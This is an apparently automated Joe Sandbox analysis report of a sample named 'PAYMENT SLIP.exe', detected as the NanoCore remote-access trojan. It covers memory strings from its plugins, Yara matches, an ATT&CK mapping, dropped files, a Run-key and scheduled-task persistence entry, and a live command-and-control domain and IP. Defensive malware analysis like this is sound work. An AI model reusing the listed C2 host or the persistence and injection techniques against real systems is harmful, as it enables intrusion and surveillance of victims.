        Source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
        Source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
        Source: hmhrpib.exe, 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: PAYMENT SLIP.exe, 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.762317389.0000000003F11000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.745514113.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 5704, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6948, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 6804, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hmhrpib.exe PID: 6376, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hmhrpib.exe PID: 6024, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6940, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 6900, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6372, type: MEMORY
        Source: Yara matchFile source: 6.2.PAYMENT SLIP.exe.3160000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.450c0f1.20.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.4507ac8.19.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40feae4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f5eae4.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40feae4.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.4507ac8.19.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a0000.33.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f6310d.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f5eae4.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a4629.32.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a0000.33.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.410310d.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPE
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057D283A bind,12_2_057D283A
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057D27E8 bind,12_2_057D27E8

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsScheduled Task/Job1Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools1Input Capture11File and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
        Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Process Injection212Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery15Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery111SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Software Packing11NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion31SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion31Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol12Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 412302 Sample: PAYMENT SLIP.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 69 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 8 other signatures 2->75 9 hmhrpib.exe 17 2->9         started        13 PAYMENT SLIP.exe 1 21 2->13         started        15 hmhrpib.exe 17 2->15         started        17 MSBuild.exe 4 2->17         started        process3 file4 57 C:\Users\user\AppData\Local\...\qm1tw12xr.dll, PE32 9->57 dropped 81 Multi AV Scanner detection for dropped file 9->81 83 Machine Learning detection for dropped file 9->83 85 Writes to foreign memory regions 9->85 19 MSBuild.exe 11 9->19         started        59 C:\Users\user\AppData\Roaming\...\hmhrpib.exe, PE32 13->59 dropped 61 C:\Users\user\AppData\Local\...\qm1tw12xr.dll, PE32 13->61 dropped 24 PAYMENT SLIP.exe 18 13->24         started        26 MSBuild.exe 13->26         started        63 C:\Users\user\AppData\Local\...\qm1tw12xr.dll, PE32 15->63 dropped 87 Maps a DLL or memory area into another process 15->87 28 MSBuild.exe 2 15->28         started        30 conhost.exe 17->30         started        signatures5 process6 dnsIp7 67 seaudo.hopto.org 23.254.130.71, 3030, 49745, 49746 HOSTWINDSUS United States 19->67 51 C:\Users\user\AppData\Roaming\...\run.dat, International 19->51 dropped 53 C:\Users\user\AppData\Local\...\tmp3E70.tmp, XML 19->53 dropped 77 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->77 32 schtasks.exe 1 19->32         started        55 C:\Users\user\AppData\Local\...\qm1tw12xr.dll, PE32 24->55 dropped 34 PAYMENT SLIP.exe 18 24->34         started        37 MSBuild.exe 24->37         started        79 Uses schtasks.exe or at.exe to add and modify task schedules 26->79 file8 signatures9 process10 file11 39 conhost.exe 32->39         started        49 C:\Users\user\AppData\Local\...\qm1tw12xr.dll, PE32 34->49 dropped 41 PAYMENT SLIP.exe 18 34->41         started        45 MSBuild.exe 34->45         started        process12 file13 65 C:\Users\user\AppData\Local\...\qm1tw12xr.dll, PE32 41->65 dropped 89 Writes to foreign memory regions 41->89 91 Maps a DLL or memory area into another process 41->91 47 MSBuild.exe 41->47         started        signatures14 process15

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        PAYMENT SLIP.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe43%ReversingLabsWin32.Backdoor.Androm

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        10.2.PAYMENT SLIP.exe.23e0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        19.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        20.2.PAYMENT SLIP.exe.2f50000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        12.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        22.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        12.2.MSBuild.exe.4507ac8.19.unpack100%AviraTR/NanoCore.fadteDownload File
        12.2.MSBuild.exe.61a0000.33.unpack100%AviraTR/NanoCore.fadteDownload File
        1.2.PAYMENT SLIP.exe.3110000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        6.2.PAYMENT SLIP.exe.3060000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        23.254.130.711%VirustotalBrowse
        23.254.130.710%Avira URL Cloudsafe
        seaudo.hopto.org0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        seaudo.hopto.org
        		23.254.130.71
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          23.254.130.71true
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          seaudo.hopto.orgtrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nsis.sf.net/NSIS_ErrorErrorPAYMENT SLIP.exefalse
            		high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            23.254.130.71
            		seaudo.hopto.orgUnited States
            		54290HOSTWINDSUStrue

            General Information

            Joe Sandbox Version:32.0.0 Black Diamond
            Analysis ID:412302
            Start date:12.05.2021
            Start time:15:40:17
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 11m 18s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:PAYMENT SLIP.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:30
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@26/31@17/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 54.1% (good quality ratio 52.4%)
            • Quality average: 85.9%
            • Quality standard deviation: 23.7%
            HCA Information:
            • Successful, ratio: 94%
            • Number of executed functions: 521
            • Number of non-executed functions: 66
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            Show All
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.43.193.48, 92.122.145.220, 13.88.21.125, 104.42.151.234, 20.82.209.183, 8.241.78.254, 67.26.73.254, 8.241.90.254, 8.241.83.126, 8.241.126.249, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.210.154
            • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            15:41:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jnckjcfx C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            15:41:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jnckjcfx C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            15:41:28API Interceptor2x Sleep call for process: hmhrpib.exe modified
            15:41:32API Interceptor752x Sleep call for process: MSBuild.exe modified
            15:41:34Task SchedulerRun new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" s>$(Arg0)

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            HOSTWINDSUS210503_McDermott_NFE_RFQ.exeGet hashmaliciousBrowse
            • 104.168.175.179
            ATT82166.HTMGet hashmaliciousBrowse
            • 23.254.226.43
            H8iVAWlIfH.exeGet hashmaliciousBrowse
            • 23.254.224.129
            PO.exeGet hashmaliciousBrowse
            • 104.168.175.179
            ATT81583.HTMGet hashmaliciousBrowse
            • 23.254.226.43
            DQhf1tNmwkbpjig.exeGet hashmaliciousBrowse
            • 104.168.175.179
            PO.exeGet hashmaliciousBrowse
            • 104.168.175.179
            quote.exeGet hashmaliciousBrowse
            • 104.168.175.179
            List.exeGet hashmaliciousBrowse
            • 104.168.175.179
            PURCHASE.exeGet hashmaliciousBrowse
            • 104.168.175.179
            b0YXIQaXcjPgzWg.exeGet hashmaliciousBrowse
            • 104.168.175.179
            SAMSUNG gFLNG FEED Update RFQ Documents and C.exeGet hashmaliciousBrowse
            • 104.168.175.179
            cvhost.exeGet hashmaliciousBrowse
            • 192.236.147.83
            cvhost.exeGet hashmaliciousBrowse
            • 192.236.147.83
            SecuriteInfo.com.W32.AIDetect.malware1.9937.exeGet hashmaliciousBrowse
            • 192.236.147.83
            SecuriteInfo.com.W32.AIDetect.malware1.32629.exeGet hashmaliciousBrowse
            • 192.236.147.83
            PROJECT_EB200_RFQ_ITEMS_DOCUMENTS.pdf.exeGet hashmaliciousBrowse
            • 104.168.175.179
            RFQ-EB200-PLOO1_Bidding.pdf.exeGet hashmaliciousBrowse
            • 104.168.175.179
            po.exeGet hashmaliciousBrowse
            • 104.168.175.179
            f5WPatHVT0.exeGet hashmaliciousBrowse
            • 192.236.147.83

